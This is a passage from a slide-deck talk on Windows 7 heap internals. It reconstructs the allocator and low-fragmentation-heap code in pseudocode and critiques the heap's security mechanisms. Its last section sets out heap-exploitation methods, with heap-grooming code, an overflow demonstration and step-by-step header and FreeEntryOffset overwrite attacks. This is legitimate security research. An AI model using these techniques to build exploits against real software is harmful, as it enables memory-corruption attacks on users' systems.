8-byte aligned int RoundSize = Round(Size); int BlockSize = Size / 8; //get the HeapListLookup, which determines if we should use the LFH _HEAP_LIST_LOOKUP *BlocksIndex = (_HEAP_LIST_LOOKUP*)heap->BlocksIndex; //loop through the HeapListLookup structures to determine which one to use while(BlocksSize >= BlocksIndex->ArraySize) { if(BlocksIndex->ExtendedLookup == NULL) { BlockSize = BlocksIndex->ArraySize - 1; break; } BlocksIndex = BlocksIndex->ExtendedLookup; } ``` * The above searching now will be referred to as: **BlocksIndexSearch()** • **RtlAllocateHeap: Part II** - The ListHints will now be queried look for an optimal entry point into the FreeLists. A check is then made to see if the LFH or the Back-end should be used. ```c //get the appropriate freelist to use based on size int FreeListIndex = BlockSize - HeapListLookup->BaseIndex; LIST_ENTRY *FreeList = &HeapListLookup->ListHints[FreeListIndex]; if (FreeList) { //check FreeList[index]->Blink to see if the heap bucket //context has been populated via RtlpGetLFHContext() //RtlpGetLFHContext() stores the HeapBucket //context + 1 in the Blink HEAP_BUCKET *HeapBucket = FreeList->Blink; if (HeapBucket & 1) { RetChunk = RtlpLowFragHeapAllocFromContext(HeapBucket+1, aBytes); if (RetChunk && heap->Flags == HEAP_ZERO_MEMORY) memset(RetChunk, 0, RoundSize); } } //if the front-end allocator did not succeed, use the back-end if (!RetChunk) { RetChunk = RtlpAllocateHeap(heap, Flags | 2, Size, RoundSize, FreeList) } ``` “Working in the library? Everyday day I’m Hustlin’!” Allocation: Back-end • **RtlpAllocateHeap: Part I** • The size is rounded if necessary and **RtlpPerformHeapMaintenance()** based on the **CompatibilityFlags**. This is what will actually enables the LFH. ```c int RoundSize = aRoundSize; //if the FreeList isn't NULL, the rounding has already been performed if (!FreeList) { RoundSize = Round(Size)RoundSize; } int SizeInBlocks = RoundSize / 8; if (SizeInBlocks < 2) { //RoundSize += sizeof(_HEAP_ENTRY) RoundSize = RoundSize + 8; SizeInBlocks = 2; } //if NOT HEAP_NO_SERIALIZE, use locking mechanisms //LFH CANNOT be enabled if this path isn't taken if (!(Flags & HEAP_NO_SERIALIZE)) { if (Heap->CompatibilityFlags & 0x60000000) RtlpPerformHeapMaintenance(Heap); } ``` • **RtlpAllocateHeap: Part II** - If there is a FreeList and it doesn’t hold a _HEAP_BUCKET update the flags used to enable the LFH. If the LFH is already enabled assign the _HEAP_BUCKET to the blink. ```c //if this freelist doesn't hold a _HEAP_BUCKET if(FreeList != NULL && !(FreeList->Blink & 1)) { //increment the counter FreeList->Blink += 0x10002; //on the 0x10th time, try to get a _HEAP_BUCKET if((WORD)FreeList->Blink > 0x20 || FreeList->Blink > 0x10000000) { int FrontEndHeap; if(Heap->FrontEndHeapType == 0x2) FrontEndHeap = Heap->FrontEndHeap; else FrontEndHeap = NULL; //gets _HEAP_BUCKET in LFH->Bucket[BucketSize] char *LFHContext = RtlpGetLFHContext(FrontEndHeap, Size); //if the context isn't set AND //we've seen 0x10+ allocations, set the flags if(LFHContext == NULL) { if((WORD)FreeList->Blink > 0x20) { //RtlpPerformHeapMaintenance heuristic if(Heap->FrontEndHeapType == NULL) Heap->CompatibilityFlags |= 0x20000000; } } else { //save the _HEAP_BUCKET in the Blink FreeList->Blink = LFHContext + 1; } } } ``` • **RtlpAllocateHeap: Part III** • If we’ve found a chunk in one of the **FreeLists** it can now be safely **unlinked** from the list and the **ListsInUseUlong** will be updated if necessary. The chunk will then be returned to the calling process. ```c //attempt to use the Flink if (FreeList != NULL && FreeList->Flink != NULL) { //saved values _HEAP_ENTRY *Blink = FreeList->Blink; _HEAP_ENTRY *Flink = FreeList->Flink; //get the heap chunk header by subtracting 8 _HEAP_ENTRY *ChunkToUseHeader = Flink - 8; DecodeAndValidateChecksum(ChunkToUseHeader); //ensure safe unlinking before acquiring this chunk for use if (Blink->Flink != Flink->Blink || Blink->Flink != FreeList) { RtlpLogHeapFailure(); //XXX RtlNtStatusToDosError and return } //update the bitmap if needed _HEAP_LIST_LOOKUP *BlocksIndex = Heap->BlocksIndex; if (BlocksIndex) { int FreeListOffset = GetFreeListOffset(); //if there are more of the same size //don't update the bitmap if (!LastInList(BlocksIndex, FreeListOffset)) BlocksIndex->ListHints[FreeListOffset] = Flink->Flink; else UpdateBitmap(BlocksIndex->ListsInUseUlong); //bitwise AND } //unlink the current chunk to be allocated Blink->Flink = Flink; Flink->Blink = Blink; } ``` Allocation: Back-end **RtlpAllocateHeap: Part IV** - If the `ListHints` weren't successful, attempt to use the `Heap->FreeList / BlocksIndex->ListHead`. If successful it will return `ChunkToUse`, otherwise the heap will need to be extended via `RtlpExtendHeap()`. ```c //BI->ListHead == Heap->FreeLists _LIST_ENTRY *HeapFreeLists = &Heap->FreeLists; _LIST_ENTRY *ChunkToUse; _HEAP_LIST_LOOKUP *BI = Heap->BlocksIndex; while(1) { //bail if the list is empty if(BI == NULL || BI->ListHead == BI->ListHead) { ChunkToUse = BI->ListHead; break; } _HEAP_ENTRY *BlinkHeader = DecodeHeader(BI->ListHead->Blink - 8); //if the requested size is too big, extend the heap if(SizeInBlocks > BlinkHeader->Size) { ChunkToUse = BI->ListHead; break; } _HEAP_ENTRY *FlinkHeader = DecodeHeader(BI->ListHead->Flink - 8); //if the first chunk is sufficient use it //otherwise loop through the rest if(FlinkHeader->Size >= SizeInBlocks) { ChunkToUse = CurrListHead->Flink; break; } else FindChunk(BlocksIndex->ListHints, SizeInBlocks); //look at the next blocks index BI = BI->ExtendedLookup; } ``` Algorithms: Allocation : Front-End “Dr. Raid will take your pizza, fo sho“ • RtlpLowFragHeapAllocFromConext: Part I • A _HEAP_SUBSEGMENT is acquired based off the _HEAP_BUCKET passed to the function. The Hint SubSegment is tried first, proceeding to the ActiveSubsegment pending a failure. If either of these succeed in the allocation request, the chunk is returned. ```c // gets the data structures based off the SizeIndex (affinity left out) _LFH_HEAP *LFH = GetLFHFromBucket(HeapBucket); _HEAP_LOCAL_DATA *HeapLocalData = LFH->LocalData[LocalDataIndex]; _HEAP_LOCAL_SEGMENT_INFO *HeapLocalSegmentInfo = HeapLocalData->SegmentInfo[HeapBucket->SizeIndex]; // try to use the 'Hint' SubSegment first // otherwise this would be 'ActiveSubsegment' _HEAP_SUBSEGMENT *SubSeg = HeapLocalSegmentInfo->Hint; _HEAP_SUBSEGMENT *SubSeg_Saved = HeapLocalSegmentInfo->Hint; if(SubSeg) { while(1) { // get the current AggregateExchange information _INTERLOCK_SEQ *AggrExchg = SubSeg->AggregateExchg; int Offset = AggrExchg->FreeEntryOffset; int Depth = AggrExchg->Depth; int Sequence = AggrExchg->Sequence; // attempt different subsegment if this one is invalid _HEAP_USERDATA_HEADER *UserBlocks = SubSeg->UserBlocks; if(!Depth || !UserBlocks || SubSeg->LocalInfo != HeapLocalSegmentInfo) break; int ByteOffset = Offset * 8; LFHChunk = UserBlocks + ByteOffset; // the next offset is stored in the 1st 2-bytes of the user data short NextOffset = UserBlocks + ByteOffset + sizeof(_HEAP_ENTRY); if(AtomicUpdate(AggrExchg, NextOffset, Depth--) return LFHChunk; else SubSeg = SubSeg_Saved; } } ``` **Allocation: Front-end** - **RtlpLowFragHeapAllocFromConext: Part II** - If a SubSegment wasn’t able to fulfill the allocation, the LFH must create a new SubSegment along with an associated **UserBlock**. A **UserBlock** is the chunk of memory that holds individual chunks for a specific _HEAP_BUCKET_. A certain formula is used to calculate how much memory should actually be acquired via the back-end allocator. ```c //assume no bucket affinity int TotalBlocks = HeapLocalSegmentInfo->Counters->TotalBlocks; int BucketBytesSize = RtlpBucketBlockSizes[HeapBucket->SizeIndex]; int StartIndex = 7; int BlockMultiplier = 5; if(TotalBlocks < (1 << BlockMultiplier)) { TotalBlocks = 1 << BlockMultiplier; } if(TotalBlocks > 1024) { TotalBlocks = 1024; } //used to calculate cache index and size to allocate int TotalBlockSize = TotalBlocks * (BucketBytesSize + sizeof(_HEAP_ENTRY)) + sizeof(_HEAP_USERDATA_HEADER) + sizeof(_HEAP_ENTRY); if(TotalBlockSize > 0x78000) { TotalBlockSize = 0x78000; } //calculate the cache index upon a cache miss, this index will determine //the amount of memory to be allocated if(TotalBlockSize >= 0x80) { do { StartIndex++; }while(TotalBlockSize >> StartIndex); } //we will @ most, only allocate 40 pages (0x1000 bytes per page) if((unsigned)StartIndex > 0x12) StartIndex = 0x12; int UserBlockCacheIndex = StartIndex; //allocate ((1 << UserBlockCacheIndex) / BucketBytesSize) chunks on a cache miss void *pUserData = RtlpAllocateUserBlock(lfh, UserBlockCacheIndex, BucketByteSize + 8); _HPP_USERDATA_HEADER *UserData = (_HEAP_USERDATA_HEADER*)pUserData; if(!pUserData) return 0; ``` • **RtlpLowFragHeapAllocFromConext: Part III** • Now that a **UserBlock** has been allocated, the LFH can acquire a **_HEAP_SUBSEGMENT**. If a SubSegment has been found it will then initialize that SubSegment along with the UserBlock; otherwise the **back-end** will have to be used to fulfill the allocation request. ```c int UserDataBytesSize = 1 << UserData->AvailableBlocks; if(UserDataBytesSize > 0x78000) { UserDataBytesSize = 0x78000; } int UserDataAllocSize = UserDataBytesSize - 8; //Increment SegmentCreate to denote a new SubSegment created InterlockedExchangeAdd(&LFH->SegmentCreate, 1); _HEAP_SUBSEGMENT *NewSubSegment = NULL; DeletedSubSegment = ExInterlockedPopEntrySList(HeapLocalData); if (DeletedSubSegment) NewSubSegment = (_HEAP_SUBSEGMENT *)(DeletedSubSegment - 0x18); else { NewSubSegment = RtlpLowFragHeapAllocateFromZone(LFH, LocalDataIndex); if(!NewSubSegment) return 0; } //this function will setup the _HEAP_SUBEMENT structure //and chunk out the data in 'UserData' to be of HeapBucket->SizeIndex chunks RtlpSubSegmentInitialize(LFH, NewSubSegment, UserBlock, RtlpBucketBlockSizes[HeapBucket->SizeIndex], UserDataAllocSize, HeapBucket); //each UserBlock starts with the same sig UserBlock->Signature = 0xF0E0D0C0; //now used for LFH allocation for a specific bucket size NewSubSegment = AtomicSwap(&HeapLocalSegmentInfo->ActiveSegment, NewSubSegment); ``` **Allocation: Front-end** - **RtlpLowFragHeapAllocFromConext**: Part IV [RtlpSubSegmentInitialize] - The **UserBlock** chunk is divided into **BucketBlockSize** chunks followed by the **SubSegment** initialization. Finally, this new SubSegment is ready to be assigned to the HeapLocalSegmentInfo->ActiveSubsegment. ### Allocation: Front-End : Example 1 #### UserBlock Chunks for 0x30 Bytes ![Diagram showing allocation of UserBlock Chunks for 0x30 Bytes](image) - **NextOffset** - +0x02: NextOffset = 0x08 - +0x08: NextOffset = 0x0E - +0x0E: NextOffset = 0x14 - +0x14: NextOffset = 0x1A - +0x1A: NextOffset = 0x14 - +0x20: NextOffset = 0x26 - +0x26: NextOffset = 0x2C - +0x2C: NextOffset = 0x32 - **Last Entry** - NextOffset = 0xFFFF - **Next Virtual Address** - NextVirtualAddress = UserBlock + (NextOffset * 0x8) - **AggrExchg.D/AggrExchg.D/AggrExchg.D/AggrExchg.D** - Depth = 0x2A - FreeEntryOffset = 0x02 --- © 2010 IBM Corporation Allocation : Front-End : Example II Allocation : Front-End : Example III UserBlock Chunks for 0x30 Bytes [0x6 Blocks] +0x0E NextOffset = 0x14 +0x1A NextOffset = 0x14 +0x20 NextOffset = 0x26 +0x26 NextOffset = 0x2C +0x14 NextOffset = 0x1A +0x2C NextOffset = 0x32 ... ... ... <table> <thead> <tr> <th>Last Entry</th> <th></th> </tr> </thead> <tbody> <tr> <td></td> <td></td> </tr> <tr> <td></td> <td></td> </tr> </tbody> </table> Last Entry NextOffset = 0xFFFF Next Virtual Address = UserBlock + (NextOffset * 0x8) AggrExchg.Depth = 0x28 AggrExchg.FreeEntryOffset = 0x0E Algorithms: Freeing “How can you go wrong? (re: Dogs wearing sunglasses)” Freeing - **RtlFreeHeap** - RtlFreeHeap will determine if the chunk is free-able. If so it will decide if the LFH or the **back-end** should be responsible for releasing the chunk. ```c ChunkHeader = NULL; // it will not operate on NULL if(ChunkToFree == NULL) return; // ensure the chunk is 8-byte aligned if(!(ChunkToFree & 7)) { // subtract the sizeof(_HEAP_ENTRY) ChunkHeader = ChunkToFree - 0x8; // use the index to find the size if(ChunkHeader->UnusedBytes == 0x5) ChunkHeader -= 0x8 * (BYTE)ChunkToFreeHeader->SegmentOffset; } else { RtlpLogHeapFailure(); return; } // position 0x7 in the header denotes whether the chunk was allocated via // the front-end or the back-end (non-encoded ;) if(ChunkHeader->UnusedBytes & 0x80) RtlpLowFragHeapFree(Heap, ChunkToFree); else RtlpFreeHeap(Heap, Flags | 2, ChunkHeader, ChunkToFree); return; ``` “Spencer Pratt explained this to me” • **RtlpFreeHeap: Part I** • The back-end manager will first look for a ListHint index to use as an insertion point. It will then attempt to update the counter used in the LFH heuristic. ```c //returns ArraySize-1 on miss & no ExtendedLookup _HEAP_LIST_LOOKUP *BlocksIndex = Heap->BlocksIndex; ChunkSize = SearchBlocksIndex(BlocksIndex, ChunkHeader->Size); //attempt to locate a FreeList _LIST_ENTRY *ListHint = NULL; //if the chunk can fit on a blocksindex OR //BlocksIndex[ArraySize-BaseIndex-1] can hold the chunk if(FitsInBlocksIndex(BlocksIndex, ChunkSize)) { int FreeListIndex = ChunkSize - BlocksIndex->BaseIndex; //acquire a dedicated freelist ListHint = BlocksIndex->ListHints[FreeListIndex]; } if(ListHint != NULL) { //If no HEAP_BUCKET adjust counter if( !(BYTE)ListHint->Blink & 1) { if(ListHint->Blink >= 2) { ListHint->Blink = ListHint->Blink - 2; } } } ``` Freeing : Back-End - **RtlpFreeHeap: Part II** - The header values are set for the chunk being freed and it is **coalesced** if necessary. While the function may be called every iteration, it will only combine chunks that are adjacently **FREE**. ```c //unless the heap says otherwise, coalesce the adjacent free blocks int ChunkSize = ChunkHeader->Size; if( !(Heap->Flags & 0x80) ) { //combine the adjacent blocks ChunkHeader = RtlpCoalesceFreeBlocks(Heap, ChunkHeader, &ChunkSize, 0x0); } //reassign the ChunkSize if necessary ChunkSize = ChunkHeader->Size; //XXX Decomit or Give to Virtual Memory if exceeding the Thresholds //mark the chunk as FREE ChunkHeader->Flags = 0x0; ChunkHeader->UnusedBytes = 0x0; ``` • **RtlpFreeHeap: Part III** • Now the heap manager will find which **BlocksIndex** and corresponding **ListHint** will manage this chunk. It will ensure that **ListHead** isn't empty and can insert this chunk before the largest chunk residing on the list. ```c BlocksIndex = Heap->BlocksIndex; _LIST_ENTRY *InsertList = Heap->FreeLists.Flink; //attempt to find where to insert this item //on the ListHead list for a particular BlocksIndex if(BlocksIndex) { int FreeListIndex = BlocksIndexSearch(BlocksIndex, ChunkSize) while(BlocksIndex != NULL) { //abort if the list is empty or too large to fit on this list _HEAP_ENTRY *ListHead = BlocksIndex-ListHead; if(ListHead == ListHead->Blink || ChunkSize > ListHead->Blink.Size) { InsertList = ListHead; break; } //start at the beginning of the ListHead pick the insertion point behind the lst //chunk larger than the ChunkToFree _LIST_ENTRY *NextChunk = BlocksIndex->ListHints[FreeListIndex]; while(NextChunk != ListHead) { //there is actually some decoding done here if(NextChunk.Size > ChunkSize) { InsertList = NextChunk; break; } NextChunk = NextChunk->Flink; } //if we've found an insertion point, break if(InsertList != Heap->FreeLists.Flink) break; BlocksIndex = BlocksIndex->ExtendedLookup; } } ``` Freeing: Back-End - **RtlpFreeHeap: Part IV** - Finally the chunk is **safely** linked into the list and `ListInUseUlong` is updated. ```c while (InsertList != Heap->FreeLists) { if (InsertList->Size > ChunkSize) break; InsertList = InsertList->Flink; } //R.I.P FreeList Insertion Attack if (InsertList->Blink->Flink == InsertList) { ChunkToFree->Flink = InsertList; ChunkToFree->Blink = InsertList->Blink; InsertList->Blink->Flink = ChunkToFree; InsertList->Blink = ChunkToFree; } else { RtlpLogHeapFailure(); } if (BlocksIndex) { FreeListIndex = BlocksIndexSearch(BlocksIndex, ChunkSize); _LIST_ENTRY *FreeListToUse = BlocksIndex->ListHints[FreeListIndex]; if (ChunkSize >= FreeListToUse->Size) BlocksIndex->ListHints[FreeListIndex] = ChunkToFree; //bitwise OR instead of previous XOR R.I.P Bitmap flipping (hi nico) if (!FreeListToUse) { int UlongIndex = ChunkSize - BlocksIndex->BaseIndex >> 5; int Shifter = ChunkSize - BlocksIndex->BaseIndex & 1F; BlocksIndex->ListsInUseUlong[UlongIndex] |= 1 << Shifter; } EncodeHeader(ChunkHeader); } ``` Algorithms: Freeing : Front-End “Omar! Omar! Omar comin’!” Freeing : Front-End • **RtlpLowFragHeapFree: Part I** • The chunk *header* will be checked to see if a relocation is necessary. Then the chunk to be freed will be used to get the *SubSegment*. Flags indicating the chunk is now *FREE* are also set. ```c //hi ben hawkes :) _HEAP_ENTRY *ChunkHeader = ChunkToFree - sizeof(_HEAP_ENTRY); if(ChunkHeader->UnusedBytes == 0x5) ChunkHeader -= 8 * (BYTE)ChunkHeader->SegmentOffset; _HEAP_ENTRY *ChunkHeader_Saved = ChunkHeader; //gets the subsegment based from the LFHKey, Heap and ChunkHeader _HEAP_SUBSEGMENT SubSegment = GetSubSegment(Heap, ChunkToFree); _HEAP_USERDATA_HEADER *UserBlocks = SubSegment->UserBlocks; //Set flags to 0x80 for LFH_FREE (offset 0x7) ChunkHeader->UnusedBytes = 0x80; //Set SegmentOffset or LFHFlags (offset 0x6) ChunkHeader->SegmentOffset = 0x0; ``` Freeing : Front-End - **RtlpLowFragHeapFree: Part II** - The Offset and Depth can now be updated. The *NewOffset* should point to the chunk that was recently freed and the depth will be incremented by 0x1. ```c while(1) { // update Offset and Depth int Depth = SubSegment->AggregateExchg.Depth; int Offset = SubSegment->AggregateExchg.FreeEntryOffset; _INTERLOCK_SEQ AggrExchg_New; AggrExchg_New.Sequence = UpdateSeq(SubSegment->AggregateExchg); if(!MaintanenceNeeded(SubSegment)) { // set the FreeEntry Offset ChunkToFree *(WORD)(ChunkHeader + 8) = Offset; // Get the next free chunk, based off the offset from the UserBlocks // add 0x1 to the depth due to freeing int NewOffset = Offset - ((ChunkHeader - UserBlocks) / 8); AggrExchg_New.FreeEntryOffset = NewOffset; AggrExchg_New.Depth = Depth + 1; // this is where Hint is set :) SubSegment->LocalInfo->Hint = SubSegment; } else { PerformSubSegmentMaintenance(SubSegment); RtlpFreeUserBlock(LFH, SubSegment->UserBlocks); break; } // _InterlockedCompareExchange64 if(AtomicSwap(&SubSegment->AggregateExchg, AggrExchg_New)) break; else ChunkHeader = ChunkHeader_Saved; } ``` Freeing : Front-End : Example I UserBlock Chunks for 0x30 Bytes [0x6 Blocks] +0x14 NextOffset = 0x1A +0x2C NextOffset = 0x32 +0x2C Last Entry NextOffset = 0xFFFF Next Virtual Address = UserBlock + (NextOffset * 0x8) AggrExchg.Depth = 0x27 AggrExchg.FreeEntryOffset = 0x14 Freeing : Front-End : Example II UserBlock Chunks for 0x30 Bytes [0x6 Blocks] <table> <thead> <tr> <th>+0x02</th> <th>+0x14</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> </tr> <tr> <td>NextOffset = 0x14</td> <td>NextOffset = 0x1A</td> </tr> </tbody> </table> <table> <thead> <tr> <th>+0x1A</th> <th>+0x20</th> <th>+0x26</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td>NextOffset = 0x14</td> <td>NextOffset = 0x26</td> <td>NextOffset = 0x2C</td> </tr> </tbody> </table> <p>| | | |</p> <table> <thead> <tr> <th></th> <th></th> <th></th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td>Last Entry</td> <td>NextOffset = 0x32</td> <td></td> </tr> </tbody> </table> Next Virtual Address = UserBlock + (NextOffset * 0x8) AggrExchg.Depth = 0x28 AggrExchg.FreeEntryOffset = 0x02 Freeing : Front-End : Example III UserBlock Chunks for 0x30 Bytes [0x6 Blocks] +0x02 +0x08 +0x14 NextOffset = 0x14 NextOffset = 0x02 NextOffset = 0x1A +0x1A +0x20 +0x26 +0x2C NextOffset = 0x14 NextOffset = 0x26 NextOffset = 0x2C NextOffset = 0x32 ... ... ... Last Entry NextOffset = 0xFFFF Next Virtual Address = UserBlock + (NextOffset * 0x8) AggrExchg.Depth = 0x29 AggrExchg.FreeEntryOffset = 0x08 Security Mechanisms “@shydemeanor I think I’m using too much code in the slides.” Security Mechanisms : Heap Randomization ```c int RandPad = (RtlpHeapGenerateRandomValue64() & 0x1F) << 0x10; // if maxsize + pad wraps, null out the randpad int TotalMaxSize = MaximumSize + RandPad; if(TotalMaxSize < MaximumSize) { TotalMaxSize = MaximumSize; RandPad = Zero; } if(NtAllocateVirtualmemory(-1, &BaseAddress....)) return 0; heap = (_HEAP*)BaseAddress; MaximumSize = TotalMaxSize; // if we used a random pad, adjust the heap pointer and free the memory if(RandPad != Zero) { if(RtlpSecMemFreeVirtualMemory()) { heap = (_HEAP*)RandPad + BaseAddress; MaximumSize = TotalSize - RandPad; } } ``` • Information • 64k aligned • 5-bits of entropy • Used to avoid the same HeapBase on consecutive runs • Thoughts • Not impossible to brute force • If TotalMaxSize wraps, there will be no RandPad • Hard to influence HeapCreate() • Unlikely due to NtAllocateVirtualmemory() failing Security Mechanisms : Header Encoding/Decoding - Information - Size, Flags, CheckSum encoded - Prevents predictable overwrites w/o information leak - Makes header overwrites much more difficult - Thoughts - NULL out Heap->EncodeFlagMask - I believe a new heap would be in order. - Overwrite first 4 bytes of encoded header to break Header & Heap->EncodeFlagMask (Only useful for items in FreeLists) - Attack last 4 bytes of the header ```c EncodeHeader(_HEAP_ENTRY *Header, _HEAP *Heap) { if(Heap->EncodeFlagMask) { Header->SmallTagIndex = (BYTE)Header ^ (Byte)Header+1 ^ (Byte)Header+2; (DWORD)Header ^= Heap->Encoding; } } ``` ```c DecodeHeader(_HEAP_ENTRY *Header, _HEAP *Heap) { if(Heap->EncodeFlagMask && (Header & Heap->EncodeFlagMask)) { (DWORD)Header ^= Heap->Encoding; } }``` Security Mechanisms: Death of Bitmap Flipping - Information - XOR no longer used - OR for population - AND for exhaustion - Thoughts - SOL - Not as important as before because FreeLists/ListHints aren't initialized to point to themselves. ```c // if we unlinked from a dedicated free list and emptied it, clear the bitmap if (reqsize < 0x80 && nextchunk == prevchunk) { size = SIZE(chunk); BitMask = 1 << (size & 7); // note that this is an xor FreeListsInUseBitmap[size >> 3] ^= vBitMask; } // Heap Alloc size = SIZE(chunk); BitMask = 1 << (size & 0x1F); BlocksIndex->ListInUseUlong[Size >> 5] &= ~BitMask; // Heap Free size = SIZE(chunk); BitMask = 1 << (size & 0x1F); BlocksIndex->ListInUseUlong[Size >> 5] |= BitMask; ``` Security Mechanisms : Safe Linking ```c if (InsertList->Blink->Flink == InsertList) { ChunkToFree->Flink = InsertList; ChunkToFree->Blink = InsertList->Blink; InsertList->Blink->Flink = ChunkToFree; InsertList->Blink = ChunkToFree } else { RtlpLogHeapFailure(); } if (BlocksIndex) { FreeListIndex = BlocksIndexSearch(BlocksIndex, ChunkSize); _LIST_ENTRY *FreeListToUse = BlocksIndex->ListHints[FreeListIndex]; //ChunkToFree.Flink/Blink are user controlled if (ChunkSize >= FreeListToUse.Size) { BlocksIndex->ListHints[FreeListIndex] = ChunkToFree; } } ``` - **Information** - Prevents overwriting a FreeList->Blink, which when linking a chunk in can be overwritten to point to the chunk that was inserted before it - Brett Moore Attacking FreeList[0] - **Thoughts** - Although it prevents Insertion attacks, if it doesn’t terminate, the chunk will be placed in one of the **ListHints** - The problem is the Flink/Blink are fully controlled due to no **Linking** process - You still have to deal with **Safe Unlinking**, but it’s a starting point. Tactics “You do not want to pray-after-free – Nico Waisman” Tactics : Heap Determinism : Activating the LFH • 0x12 (18) consecutive allocations will guarantee LFH enabled for SIZE • 0x11 (17) if the _LFH_HEAP has been previously activated ```c //Without the LFH activated //0x10 => Heap->CompatibilityFlags |= 0x20000000; //0x11 => RtlpPerformHeapMaintenance(Heap); //0x11 => FreeList->Blink = LFHContext + 1; for (i = 0; i < 0x12; i++) HeapAlloc(pHeap, 0x0, SIZE); ``` Tactics : Heap Determinism : Defragmentation Gray = BUSY Blue = FREE A game of filling the holes Easily done by making enough allocations to create a new **SubSegment** with associated **UserBlock** EnableLFH(SIZE); NormalizeLFH(SIZE); alloc1 = HeapAlloc(pHeap, 0x0, SIZE); alloc2 = HeapAlloc(pHeap, 0x0, SIZE); memset(alloc2, 0x42, SIZE); *(alloc2 + SIZE-1) = '\0'; alloc3 = HeapAlloc(pHeap, 0x0, SIZE); memset(alloc3, 0x43, SIZE); *(alloc3 + SIZE-1) = '\0'; printf("alloc2 => %s\n", alloc2); printf("alloc3 => %s\n", alloc3); memset(alloc1, 0x41, SIZE * 3); printf("Post overflow..\n"); printf("alloc2 => %s\n", alloc2); printf("alloc3 => %s\n", alloc3); Result: alloc2 => BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB alloc3 => CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Post overflow.. alloc2 => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCC CCCCCCCC alloc3 => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCC alloc1 = HeapAlloc(pHeap, 0x0, SIZE); alloc2 = HeapAlloc(pHeap, 0x0, SIZE); alloc3 = HeapAlloc(pHeap, 0x0, SIZE); HeapFree(pHeap, 0x0, alloc2); //overflow-able chunk just like alloc1 could reside in same position as alloc2 alloc4 = HeapAlloc(pHeap, 0x0, SIZE); memcpy(alloc4, src, SIZE) • Overwrite into adjacent chunks (requires normalization) • Can overwrite NULL terminator (Vreugdenhil 2010) • Ability to use data in a recently freed chunk with proper heap manipulation Tactics : Heap Determinism : Data Seeding EnableLFH(SIZE); NormalizeLFH(SIZE); for(i = 0; i < 0x4; i++) { allocb[i] = HeapAlloc(pHeap, 0x0, SIZE); memset(allocb[i], 0x41 + i, SIZE); } printf("Freeing all chunks!\n"); for(i = 0; i < 0x4; i++) { HeapFree(pHeap, 0x0, allocb[i]); } printf("Allocating again\n"); for(i = 0; i < 0x4; i++) { allocb[i] = HeapAlloc(pHeap, 0x0, SIZE); } Result: Allocation 0x00 for 0x28 bytes =&gt; 41414141 41414141 41414141 Allocation 0x01 for 0x28 bytes =&gt; 42424242 42424242 42424242 Allocation 0x02 for 0x28 bytes =&gt; 43434343 43434343 43434343 Allocation 0x03 for 0x28 bytes =&gt; 44444444 44444444 44444444 Freeing all chunks! Allocating again Allocation 0x00 for 0x28 bytes =&gt; 0E004444 44444444 44444444 Allocation 0x01 for 0x28 bytes =&gt; 08004343 43434343 43434343 Allocation 0x02 for 0x28 bytes =&gt; 02004242 42424242 42424242 Allocation 0x03 for 0x28 bytes =&gt; 62004141 41414141 41414141 • Saved FreeEntryOffset resides in 1st 2 bytes • Influence the LSB of vtable • Good for use-after-free • See Nico Wasiman’s 2010 BH Presentation / Paper • NICO Rules! Tactics : Exploitation “For the Buristicati, By the Buristicati” RtlpLowFragHeapFree() will adjust the _HEAP_ENTRY if certain flags are set. ``` _HEAP_ENTRY *ChunkHeader = ChunkToFree - sizeof(_HEAP_ENTRY); if (ChunkHeader->UnusedBytes == 0x5) ChunkHeader -= 8 * (BYTE)ChunkHeader->SegmentOffset; ``` <table> <thead> <tr> <th>Flags</th> <th>Checksum</th> <th>Prev Size</th> <th>Seg Offset</th> <th>UnusedBytes</th> </tr> </thead> <tbody> <tr> <td>0</td> <td>2</td> <td>3</td> <td>4</td> <td>6</td> </tr> <tr> <td>Size</td> <td>Flags</td> <td>Checksum</td> <td>Prev Size</td> <td>Seg Offset</td> </tr> </tbody> </table> If you can overflow into a chunk that will be freed, the `SegmentOffset` can be used to point to another valid _HEAP_ENTRY. This could lead to controlling data that was previously allocated (Think C++ objects) **Prerequisites** - Ability to allocate SIZE - Place legitimate a chunk before a chunk to be overflowed - Overflow at least 8-bytes - Ability to free overwritten chunk **Methodology** 1. Enable LFH 2. Normalize LFH 3. Alloc1 4. Alloc2 5. Overwrite Alloc2's header to point to an object of interest 6. Free Alloc2 7. Alloc3 (will point to the object of interest) 8. Write data Tactics : Exploitation : FreeEntryOffset Overwrite: Part I All code in RtlpLowFragHeapAllocFromContext() is wrapped in try/catch{} . All exceptions will return 0, letting the back-end handle the allocation. ```c try { // the next offset is stored in the 1st 2-bytes of userdata short NextOffset = UserBlocks + BlockOffset + sizeof(_HEAP_ENTRY)); _INTERLOCK_SEQ AggrExchg_New; AggrExchg_New.Offset = NextOffset; } catch { return 0; } ``` As we saw, the FreeEntryOffset is stored in the 1st 2 bytes of user- writeable data within each chunk in a UserBlock. This will be used to get the address of the next free chunk used for allocation. What if we overflow this chunk? Assume a **full** UserBlock for 0x30 bytes (0x6 blocks). Our first allocation will update the **FreeEntryOffset** to **0x0008**. (Stored in the _INTERLOCK_SEQ_.FreeEntryOffset) Memory Pages <table> <thead> <tr> <th>+0x02</th> <th>+0x08</th> <th>+0x0E</th> <th>+0x14</th> </tr> </thead> <tbody> <tr> <td>NextOffset = 0x0008</td> <td>NextOffset = 0x000E</td> <td>NextOffset = 0x0014</td> <td>NextOffset = 0x001A</td> </tr> </tbody> </table> ... ... ... NextOffset = 0xFFFF (Last Entry) FreeEntryOffset = 0x0002 If an overflow of at least 0x9 bytes (0xA preferable) is made. The saved FreeEntryOffset of the adjacent chunk can be overwritten. This gives the attacker a range of 0xFFFF * 0x8 (Offsets are stored in blocks and converted to byte offsets.) An allocation for the overwritten block must be made next to store the tainted offset in the _INTERLOCK_SEQ. In this example, we will have a 0x1501 * 0x8 jump to the next ‘free chunk’. Tactics : Exploitation : FreeEntryOffset Overwrite: Part V Since it's possible to get SubSegments adjacent to each other in memory, you can write into other forwardly adjacent memory pages (Control over allocations is required). This gives you the ability to overwrite data that is in a different _HEAP_SUBSEGMENT than the one which you are overflowing. <table> 